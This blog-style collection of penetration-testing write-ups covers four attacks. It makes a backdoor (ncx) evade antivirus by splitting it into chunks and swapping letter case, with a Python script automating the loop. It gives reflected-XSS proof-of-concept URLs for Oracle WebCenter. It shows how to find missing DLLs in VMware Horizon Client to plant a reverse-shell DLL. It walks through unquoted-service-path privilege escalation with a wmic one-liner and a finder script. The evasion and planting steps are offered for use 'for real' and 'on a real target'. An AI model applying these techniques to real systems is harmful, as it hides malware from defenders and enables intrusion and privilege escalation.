Antivirus Evasion

A few weekends back I was wondering how malware evades antivirus solutions. Is it really that easy?

With that in mind I started looking at some known malware samples and picked anti-malware products at random. To my surprise, AVs can still be tricked with a technique as old as string substitution, so today we will walk through this very well-known method. As the test sample I chose ncx, a backdoor that binds itself to port 99 and hands a command prompt of the system to whoever connects to it.

First, let's scan the unmodified sample to check whether it is detected.

As the screenshot below shows, ncx is detected by our antivirus.

Let's split the file into small chunks. After a bit of trial and error I found that splitting into 17-byte chunks does not break any of the AV's signatures, i.e. each flagged string stays intact inside a single chunk. The trick is to keep splitting as long as the AV keeps flagging the resulting pieces: the chunks it still detects tell you exactly where the signatures live, and one split too fine cuts a signature in two so that nothing is flagged any more.

Scanning the split chunks produced two detections: chunks 1 and 4 were identified as malicious.

Change the lower-case 'cmd' to upper-case 'CMD' and save the chunk. Windows resolves program names case-insensitively, so CMD still launches cmd.exe, but the exact byte sequence the signature matches on is gone.

Yes, no more detection!

On the sixth line of chunk 1, change the upper-case 'S' to a lower-case 's' and save it.

Scan it again: the AV no longer detects this chunk either.

Finally, join the chunks back together into one file.

Rename the joined file.

The scan shows no more detections 🙂

And on execution we can see that it is indeed listening on port 99, so the two case swaps broke the signatures without breaking the backdoor.

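The split / scan / patch / join loop from the steps above, done in Python as an added example (it is not the author's tooling; the write-up used a file splitter and a hex editor). The "antivirus" here is a constructed list of byte-string signatures and the sample blob is constructed and inert, not ncx; both are assumptions of the example, not something the page provides.

```python
"""Added example, not the write-up's tooling: the split / scan / patch / join
loop from the steps above, against a constructed stand-in for the AV.

Assumptions, all constructed for this example:
  * SIGNATURES is what the "antivirus" matches on (plain byte substrings);
  * SAMPLE is an inert blob with two such strings in it, not ncx or any real
    executable.
"""
from typing import List

SIGNATURES = [b"cmd.exe", b"Shell"]          # constructed stand-in for AV signatures

SAMPLE = (                                   # constructed, inert "binary"
    b"MZ" + b"\x90" * 40
    + b"cmd.exe" + b"\x00" * 30
    + b"Shell started" + b"\x00" * 20
)


def scan(blob: bytes) -> List[bytes]:
    """Signatures that fire on `blob`; an empty list means 'clean'."""
    return [sig for sig in SIGNATURES if sig in blob]


def split(blob: bytes, size: int) -> List[bytes]:
    """Consecutive chunks of `size` bytes (the last one may be shorter)."""
    return [blob[i:i + size] for i in range(0, len(blob), size)]


def join(chunks: List[bytes]) -> bytes:
    return b"".join(chunks)


def flagged_chunks(chunks: List[bytes]) -> List[int]:
    """Indices of the chunks the scanner still detects."""
    return [i for i, chunk in enumerate(chunks) if scan(chunk)]


def narrow(blob: bytes) -> int:
    """Keep halving the chunk size while some chunk is still flagged.

    Returns the smallest size that still localises every signature inside a
    single chunk; one step finer and the split cuts the signature in two, all
    chunks scan clean, and the 'trial and error' has gone one step too far.
    """
    size = len(blob)
    while True:
        half = max(1, size // 2)
        if half == size or not flagged_chunks(split(blob, half)):
            return size
        size = half


def swap_case_at(chunk: bytes, needle: bytes) -> bytes:
    """Flip the case of the first occurrence of `needle` ('cmd' -> 'CMD').

    Length is unchanged, so offsets inside the binary stay valid. This only
    works where the string is consumed case-insensitively (Windows program
    and file names are), which is why 'cmd' -> 'CMD' keeps the backdoor working.
    """
    idx = chunk.find(needle)
    if idx < 0:
        return chunk
    return chunk[:idx] + needle.swapcase() + chunk[idx + len(needle):]


def evade(blob: bytes, size: int) -> bytes:
    """Split at `size`, case-swap the matched string in each flagged chunk, rejoin."""
    chunks = split(blob, size)
    for i in flagged_chunks(chunks):
        for sig in scan(chunks[i]):
            chunks[i] = swap_case_at(chunks[i], sig)
    return join(chunks)


if __name__ == "__main__":
    size = narrow(SAMPLE)
    print("chunk size:", size, "flagged chunks:", flagged_chunks(split(SAMPLE, size)))
    patched = evade(SAMPLE, size)
    print("after patch:", scan(patched) or "clean",
          "| same length:", len(patched) == len(SAMPLE))
```

Two caveats worth keeping in mind when doing this for real: the case swap is only safe for bytes the program treats case-insensitively (a string passed to CreateProcess or CreateFile, not code or a case-sensitive protocol string), and what it defeats is a static substring signature; an engine that emulates the binary or keys on the port-99 bind behaviour is not fooled by it.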
POC Video:-

Oracle Web Center XSS

Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two reflected cross-site scripting (XSS) vulnerabilities have been identified in Oracle Web Center.
They are easy to exploit and can be used to steal cookies, perform phishing attacks
and carry out various other attacks that compromise the security of a user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

Solution
========================================================================================
Apply the Oracle Critical Patch Update (CPU) of July 2017.

VMWare Horizon View Client <= 5.4 DLL Hijacking

During one pentest assignment I had to perform a security assessment of the VMware Horizon View Client. Since it is a native Windows application, the attack vectors are different from those of a normal web app. I started by looking at memory, then at the traffic, then at the registry, and found nothing; I was at a total loss. Fortunately, a native application has to load DLLs, so there is a pretty good chance that the developers forgot to load some of them explicitly via a complete path. What does that mean? Say an application requires abc.dll and asks for it by bare name, i.e. LoadLibrary("abc.dll") rather than a full path. With the default SafeDllSearchMode enabled, Windows then looks for abc.dll in the following order:-

  • The directory from which the application loaded.
  • The system directory (C:\Windows\System32; for a 32-bit process on 64-bit Windows this is redirected to C:\Windows\SysWOW64).
  • The 16-bit system directory (C:\Windows\System).
  • The Windows directory (C:\Windows).
  • The current directory.
  • The directories listed in the PATH environment variable.

If the DLL is missing from every one of these locations, a file of that name planted in whichever of the directories we can write to is the one the loader picks up.

I fired up Process Monitor with the following rules:-

Next I started the application to see which DLLs it tries to load but cannot find.

As we can see, Trutil.dll is required by the application and is clearly missing from every location probed.

So we drop a DLL named Trutil.dll that carries a reverse-shell payload into one of the directories from the search order that we can write to. Once the application is launched we get our reverse shell... sweet!!!
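The Process Monitor step above, reproduced offline as an added example (not the author's tooling): it reads a Procmon CSV export, keeps the CreateFile probes for DLLs that ended in NAME NOT FOUND, and lists where a planted copy would be picked up, in the loader's search order. The CSV rows, the process name, the application directory, the current directory, the PATH value and the writable-directory check are all constructed assumptions; Trutil.dll is the name the write-up found.

```python
"""Added example, not the author's tooling: the Process Monitor step above done
offline. It reads a Procmon CSV export, keeps the CreateFile probes for DLLs
that ended in NAME NOT FOUND, and lists where a planted copy would be picked
up, in the loader's search order. The CSV rows, the process name, the
application directory, the current directory and the PATH value are
constructed for this example; Trutil.dll is the name the write-up found.
"""
import csv
import io
from typing import Callable, Dict, List

# Constructed Procmon export (same column layout as File > Save... > CSV).
PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","vmware-view.exe","4120","CreateFile","C:\\Program Files (x86)\\VMware\\VMware Horizon View Client\\Trutil.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","vmware-view.exe","4120","CreateFile","C:\\Windows\\SysWOW64\\Trutil.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","vmware-view.exe","4120","CreateFile","C:\\Windows\\SysWOW64\\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.4","vmware-view.exe","4120","CreateFile","C:\\Users\\bob\\Downloads\\Trutil.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.5","vmware-view.exe","4120","RegOpenKey","HKLM\\SOFTWARE\\VMware, Inc.","NAME NOT FOUND",""
"""

APP_DIR = r"C:\Program Files (x86)\VMware\VMware Horizon View Client"  # constructed
CWD = r"C:\Users\bob\Downloads"                                         # constructed
PATH_ENV = r"C:\Windows\System32;C:\Windows;C:\Python27"                # constructed


def missing_dlls(csv_text: str) -> Dict[str, List[str]]:
    """DLL file name -> every location the loader probed without finding it."""
    found: Dict[str, List[str]] = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        found.setdefault(path.rsplit("\\", 1)[-1], []).append(path)
    return found


def search_order(app_dir: str, cwd: str, path_env: str, wow64: bool = False) -> List[str]:
    """Directories Windows searches for a DLL requested by bare name, with the
    default SafeDllSearchMode on. wow64=True models a 32-bit process on 64-bit
    Windows, where 'the system directory' is redirected to SysWOW64."""
    system_dir = r"C:\Windows\SysWOW64" if wow64 else r"C:\Windows\System32"
    order = [app_dir, system_dir, r"C:\Windows\System", r"C:\Windows", cwd]
    return order + [p for p in path_env.split(";") if p]


def hijack_paths(dll: str, order: List[str], writable: Callable[[str], bool]) -> List[str]:
    """Full paths at which a planted `dll` would be loaded, earliest first,
    restricted to directories `writable` says we can write to. Because the DLL
    is missing everywhere, the first entry wins: nothing legitimate precedes it."""
    return [d.rstrip("\\") + "\\" + dll for d in order if writable(d)]


if __name__ == "__main__":
    order = search_order(APP_DIR, CWD, PATH_ENV, wow64=True)

    def writable(directory: str) -> bool:  # stand-in for an ACL check (icacls / os.access on a real box)
        return directory in {CWD, r"C:\Python27"}

    for dll, probes in missing_dlls(PROCMON_CSV).items():
        print(dll, "probed at", len(probes), "locations; plant at:",
              hijack_paths(dll, order, writable))
```

A DLL that runs its payload from DllMain is enough here: the loader calls DllMain on attach before the application gets to resolve any export, so even if the client then fails because the function it wanted is absent, the shell is already live. Note also the current directory sits above PATH in the order, which is why launching the client from a directory you control is often the easiest drop location.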

Unquoted Service Path Privilege Escalation

During a pentest engagement we often manage to get a shell (usually that is enough to prove the point), but what if one can truly get complete hold of the system?

There are tons of privilege escalation techniques out there, from exploiting kernel-level bugs to abusing misconfigurations, and so on and so forth.

One way to get elevated access is to exploit unquoted service paths of services running under a highly privileged account such as an administrator or the SYSTEM account.

The concept behind an unquoted service path is this: when the path contains white space and is not enclosed in quotes, Windows cannot tell where the executable name ends and the arguments begin. It therefore tries every prefix that ends at a space, appending .exe to each, and runs the first file that exists; only if none of them exists does it fall through to the full path. To make it clearer, take a look at the example below:-

C:\Program Files\Company Name\AppName Version\App_Binary.exe

When the service starts, Windows first looks for C:\Program.exe. If it does not find a binary by that name it looks for C:\Program Files\Company.exe, then C:\Program Files\Company Name\AppName.exe, and only then for the intended C:\Program Files\Company Name\AppName Version\App_Binary.exe. If it finds a binary at any of the earlier candidates, say Company.exe, Windows executes that instead of the original App_Binary.exe.

So in order to exploit this scenario the following conditions must be met:-

1- The service runs under a highly privileged account, i.e. administrator or SYSTEM.

2- The service path is unquoted and contains white space.

3- One must have write access to at least one of the directories in which a candidate binary would be looked for (C:\ or C:\Program Files\Company Name\ in the example above). The default system locations are not writable by standard users, so in practice this is a vendor install directory with loose ACLs.

For the demo I used Foxit PDF Reader version 7.0.6.1126.

Download Link:- http://www.oldapps.com/foxit_reader.php?old_foxit_reader=15897?download

The following screenshot shows that we already have limited (unprivileged) access to the system.

The following wmic query, shamelessly stolen from the internet, helps identify unquoted service paths: it lists auto-start services whose binary lives outside C:\Windows and whose PathName contains no double quote.

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

With the cacls utility (icacls on newer Windows versions) we can enumerate the directory permissions. In our case the directory grants append/write rights to the unprivileged user, which means one can create files in it.

Upload the malicious binary to that directory, named after the fragment Windows will try first there, i.e. the part of the unquoted path up to the next space with .exe appended.

Once the service is restarted it executes our binary instead of the intended one and provides us with elevated privileges. An unprivileged user normally cannot restart a service, so with an auto-start service this usually means waiting for, or triggering, a reboot.
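The check behind the wmic | findstr chain above, as an added example that is not the write-up's tooling: it parses a constructed copy of `wmic service get name,displayname,pathname,startmode` output (wmic prints properties alphabetically in fixed-width columns, and that layout is reproduced here), applies the same auto-start / outside-C:\Windows / unquoted filter, and lists the candidate binaries Windows would try before the real one. It goes a little beyond the text by also handling the case of a quoted path with arguments and of a path that is unquoted but has no writable candidate directory. Service names, paths and the writable-directory predicate are constructed (the Foxit row is modelled on the service the demo targets).

```python
"""Added example, not the write-up's tooling: the check behind the wmic |
findstr one-liner above, run offline over a constructed copy of
`wmic service get name,displayname,pathname,startmode` output, plus the list
of binaries Windows would try before the real one. Service names, paths and
the writable-directory predicate are constructed (the Foxit row is modelled
on the service the demo targets); wmic prints properties alphabetically in
fixed-width columns, which is the layout reproduced here.
"""
import re
from typing import Callable, Dict, List

_ROWS = [  # constructed table rows, header first
    ("DisplayName", "Name", "PathName", "StartMode"),
    ("Foxit Cloud Safe Update Service", "FoxitCloudUpdateService",
     r"C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe", "Auto"),
    ("Windows Update", "wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Manual"),
    ("Some Vendor Agent", "SVAgent", r'"C:\Program Files\Some Vendor\Agent\agent.exe" -service', "Auto"),
    ("Legacy Backup", "LegacyBackup", r"C:\Backup Tools\backup.exe", "Auto"),
]
WMIC_OUTPUT = "\n".join("{:<34}{:<26}{:<86}{}".format(*r) for r in _ROWS) + "\n"


def parse_wmic(text: str) -> List[Dict[str, str]]:
    """Parse wmic's fixed-width table by slicing rows at the header's column offsets."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    starts = [start for _, start in cols] + [None]
    return [{name: line[starts[i]:starts[i + 1]].strip() for i, (name, _) in enumerate(cols)}
            for line in lines[1:]]


def binary_of(pathname: str) -> str:
    """Executable part of a service PathName with the arguments stripped.
    A quoted path is unambiguous; an unquoted one is taken up to the first .exe."""
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)]
    m = re.match(r"(.+?\.exe)\b", pathname, re.IGNORECASE)
    return m.group(1) if m else pathname.split(" ")[0]


def is_unquoted_with_space(pathname: str) -> bool:
    return not pathname.startswith('"') and " " in binary_of(pathname)


def candidate_binaries(binary: str) -> List[str]:
    """What CreateProcess tries, in order, for an unquoted path with spaces:
    each prefix ending at a space with '.exe' appended, then the full path."""
    cands, idx = [], binary.find(" ")
    while idx != -1:
        cands.append(binary[:idx] + ".exe")
        idx = binary.find(" ", idx + 1)
    return cands + [binary]


def find_vulnerable(text: str, writable: Callable[[str], bool]) -> List[Dict[str, object]]:
    """Auto-start services outside C:\\Windows with an unquoted, space-containing
    path (the same filter as the wmic|findstr chain), each with the first
    candidate an attacker could plant given `writable` (directory -> bool)."""
    hits = []
    for row in parse_wmic(text):
        path = row["PathName"]
        if row["StartMode"].lower() != "auto" or path.lower().startswith("c:\\windows\\"):
            continue
        if not is_unquoted_with_space(path):
            continue
        cands = candidate_binaries(binary_of(path))[:-1]  # the real binary itself is not a target
        plant = next((c for c in cands if writable(c.rsplit("\\", 1)[0])), None)
        hits.append({"Name": row["Name"], "candidates": cands, "plant": plant})
    return hits


if __name__ == "__main__":
    def writable(directory: str) -> bool:  # stand-in for the cacls/icacls check
        return directory.lower() == r"c:\program files (x86)\foxit software\foxit reader"

    for hit in find_vulnerable(WMIC_OUTPUT, writable):
        print(hit["Name"], "->", hit["plant"] or "no writable candidate directory")
```

On a real target, pipe the wmic output into parse_wmic() and back `writable` with icacls (or os.access from the low-privileged shell); a service that shows up with `plant` set to None satisfies conditions 1 and 2 but not 3, and is not exploitable this way. Note the candidate list includes entries like `C:\Program Files.exe`, which is exactly how CreateProcess behaves and why C:\ being writable for files would make almost every unquoted path exploitable.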